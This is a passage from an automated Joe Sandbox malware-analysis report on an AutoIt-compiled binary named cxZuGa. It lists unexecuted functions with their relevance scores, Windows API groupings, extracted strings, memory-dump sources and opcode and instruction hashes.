                                                            • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                            • Instruction Fuzzy Hash: F2F054C8B19247C5FD247BB57811775D5905F48BA0FC84232DA2E492C9DD7CE480C132

                                                            Non-executed Functions

                                                            Function 00007FF7EC1B56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                            • Instruction ID: 2e0be2f8b7e84e31d2722f8f05caadfef4308fafef2c8ec54b0966e682149286
                                                            • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                            • Instruction Fuzzy Hash: FA2290BAA08681C6E714EF25E84476DB7A0FB88B94F904136DE4E47B68DF3CD445CB11
                                                            Function 00007FF7EC1CCE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                            • String ID:
                                                            • API String ID: 3481653762-0
                                                            • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                            • Instruction ID: 7c2a2a4a435e588348601a869398911db737480be0dfefc68adc80fb838010f8
                                                            • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                            • Instruction Fuzzy Hash: 1432C6BAA08A8186E754EF25E444BBDB7A0FB85B84F904136EE4E53B58CF3CE445C711
                                                            Function 00007FF7EC1CBA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1218376639-328681919
                                                            • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                            • Instruction ID: 72300865cce5360898c0ca244f8286a483c0c01f183dff80d754cabb28a17826
                                                            • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                            • Instruction Fuzzy Hash: A712E4BAA0964282F714AF25F454BBDA7A0EB85B94F944132EE1D47BD4CF3CE442C721
                                                            Function 00007FF7EC1CDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                            • String ID: P
                                                            • API String ID: 1208186926-3110715001
                                                            • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction ID: aff9843c016a8d6cfc3b877139f0fb152778aba3244f71ce10c822f439210734
                                                            • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction Fuzzy Hash: 1B1218FAB0864286E728AB25F454BBDA7A0FF85794F900536EA4D17A94CF3CE441C721
                                                            Function 00007FF7EC144514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 3778422247-2988720461
                                                            • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                            • Instruction ID: c0ff6fcbdc58be2a7dfd236fe4cec3da74967428f32ccb441a9a35a9139d9ce0
                                                            • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                            • Instruction Fuzzy Hash: 1C416AE9F0CA1243F714AB25B914739A792BF88B82FD45037C90A47B58DE3D944AC762
                                                            Function 00007FF7EC18CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                            • String ID: default$winsta0$winsta0\default
                                                            • API String ID: 3202303201-1423368268
                                                            • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction ID: c7b8d2aafb44b56e9ae22a548a16eb2a2b58fa38b7e44f4c30cc5f54b00c8a00
                                                            • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction Fuzzy Hash: 09A15DBAA0CB4286E710EF65B5403A9A7A1FF85794F840136EE5D4BB98CF3CE005C712
                                                            Function 00007FF7EC122AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction ID: 353c05f42271c44f14d301f52e4c3020f44b4fc2eb5a6083c5aa4320591ccb87
                                                            • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction Fuzzy Hash: CFD192BAA04A42CAE714EF38E8507AC77A1FB44B59F900136DA1E477A8DF3CE444C751
                                                            Function 00007FF7EC1B0A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction ID: 95ddd82653238c60d7f872654d1bbb87307553d473468012f8ca9b82a6dc8d2f
                                                            • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction Fuzzy Hash: 24717CE9A08A42C2EA24BB15F45437DA761FF84B85FC0403AD95E037A5DF3CE606C762
                                                            Function 00007FF7EC1CC6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                            • String ID:
                                                            • API String ID: 1015379403-0
                                                            • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction ID: 586508e9171ac27cfd5d8c5311050b205db019d77772c8a4fb53e004ca1f8504
                                                            • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction Fuzzy Hash: F802F7B9A0878285EB24AF24B454BBDA761FB44794F984133EA5D07BD4CF3CE941C722
                                                            Function 00007FF7EC1B206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction ID: 8cddf40949f7dd6e62c52bc0b92a4bed8c572ba6eb3a8c6f34e61542aa0b8578
                                                            • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction Fuzzy Hash: 87515EBAB0CB028AEB44AB64F45837D6BA1EB49745F50443AD90E83788DE7CE455C315
                                                            Function 00007FF7EC1C0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseValue$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3314541760-966354055
                                                            • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction ID: 78a98b0e3b83e5417cc338d9f44b8b23d920e03c690fbc28889169a643d82696
                                                            • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction Fuzzy Hash: 130271AAB08B82C5EB14FF25E4507ADB7A0FB88B88B858432EE0D47756DF38D545C351
                                                            Function 00007FF7EC125F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P
                                                            • API String ID: 0-3110715001
                                                            • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction ID: dc514a76b69ecfa2a76856d94bf24ad52f12b5f184a5364abf4107d2d7b896fb
                                                            • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                            • Instruction Fuzzy Hash: 76A1D3BAA0864186E728EF25E4543BAFB61FB84788F908137DA4E03A94DF7CE445C711
                                                            Function 00007FF7EC162400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                            • String ID: -$:$:$?
                                                            • API String ID: 3440502458-92861585
                                                            • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                            • Instruction ID: 1fe7675c0034c7a329be8bc34585fcebb34d59c393ac1709d5b8194721f13bc5
                                                            • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                            • Instruction Fuzzy Hash: 24E1F2BAA0828286F720EF35B8517B9B794BF84788FD45137EA4D42A95DF3CD441C722
                                                            Function 00007FF7EC1AA350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                            • Instruction ID: 5b836806d0bc6daccea8454a9231b3778b0f07444e27b1da1bd2bb33a063f68a
                                                            • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                            • Instruction Fuzzy Hash: 0D41B4A960864294EB40AB15F8443B9E7A4FF44BA5FC88133DD6D47698DF3CD40AC722
                                                            Function 00007FF7EC1AA4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                            • Instruction ID: 086f5257da01af9f7d478d32f4ed860649803ff235352a7718f66727deda370d
                                                            • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                            • Instruction Fuzzy Hash: 7741709960CA4291EA50AB15B8447B9E790FF44BE5FC44133DD6D076E9EF3CD40ACB22
                                                            Function 00007FF7EC1A3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 3827137101-3457252023
                                                            • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction ID: 008bbed4630d98bad3b6feddb4e36a46ead181a8418cc397cf41716f8ae6bae1
                                                            • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                            • Instruction Fuzzy Hash: 6C41A4A661868385E720AF21F8007FDA7A0FF85799F940136DA0D47BA8DF7CD546C712
                                                            Function 00007FF7EC1C055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3218304859-0
                                                            • Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                            • Instruction ID: 790eb3680a71ef250109f18e98df5754376651552a1fc02faf732eff12c59e8b
                                                            • Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                            • Instruction Fuzzy Hash: F8F1B2BAB05A42C6EB14EF65E0907ACB7B0FB84B98B818136DE4E47B95DF38D001C755
                                                            Function 00007FF7EC1A83D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
